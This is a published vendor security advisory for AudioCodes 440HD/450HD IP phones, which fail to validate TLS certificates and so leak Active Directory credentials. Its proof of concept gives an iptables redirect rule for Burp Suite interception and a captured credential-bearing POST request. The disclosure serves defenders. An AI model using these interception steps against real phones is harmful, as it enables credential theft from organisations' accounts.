Advisory ID: SYSS-2018-026 Product: 440HD / 450HD IP Phone Manufacturer: AudioCodes Affected Version(s): <= 3.1.2.89 Tested Version(s): VC_3.1.1.43.1, VC_3.1.2.89 Vulnerability Type: X.509 validation - Man-in-the-Middle (CWE-300) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2018-08-29 Solution Date: 20??-??-?? Public Disclosure: 2018-10-23 CVE Reference: CVE-2018-18567 Author of Advisory: Micha Borrmann (SySS GmbH) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: If a AudioCodes 440HD/450HD IP Phone [1] is used with an on-premise installation with Skype for Business, the phone has stored credentials of an account in the active directory. Performing a man-in-the-middle attack, the phone give away the credentials to an attacker and therefore the account will be compromised. The phone itself is fully functional and will not show any hints of an attack. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The phone sends the stored credentials to a website usually named skypewebpool via HTTPS but does not validate the X.509 certificate. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Configure Burp Suite as invisible proxy an gain a Man-in-the-Middle-position. Set an iptables rule, that routes the traffic through Burp Suite, like # iptables -A PREROUTING -t nat -i eth0 -s 192.168.100.100 -p tcp --dport 443 -j REDIRECT --to-port 8080 Watch the proxy history for a HTTP POST request like POST /WebTicket/oauthtoken HTTP/1.1 Host: skypewebpool.example.com User-Agent: AUDC/3.1.1.43 AUDC-IPPhone-440HD_UC_3.1.1.43/1 Content-Length: 163 Content-Type: application/x-www-form-urlencoded Connection: close grant_type=password&client_id=abc...&resource=https%3a%2f%2fskypewebpool.example.com&password=verytopsecretpassword&username=ADaccountname ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Install the new firmware, which has a trust store integrated and a strict X.509 certificate validation policy, too. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2018-08-13: Detection of the vulnerability 2018-09-06: Vulnerability reported to manufacturer 2018-10-22: CVE number assigned 2018-10-23: Public release of the security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product web sites for the phones https://www.audiocodes.com/solutions-products/products/ip-phones/440hd-ip-phone https://www.audiocodes.com/solutions-products/products/ip-phones/450hd-ip-phone [2] SySS Security Advisory SYSS-2018-026 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-026.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Micha Borrmann of SySS GmbH. E-Mail: micha.borrmann (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Micha_Borrmann.asc Key Fingerprint: F2E7 C6A5 9950 84ED 7AD6 0DD4 EDBE 26E7 14EA 5876 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en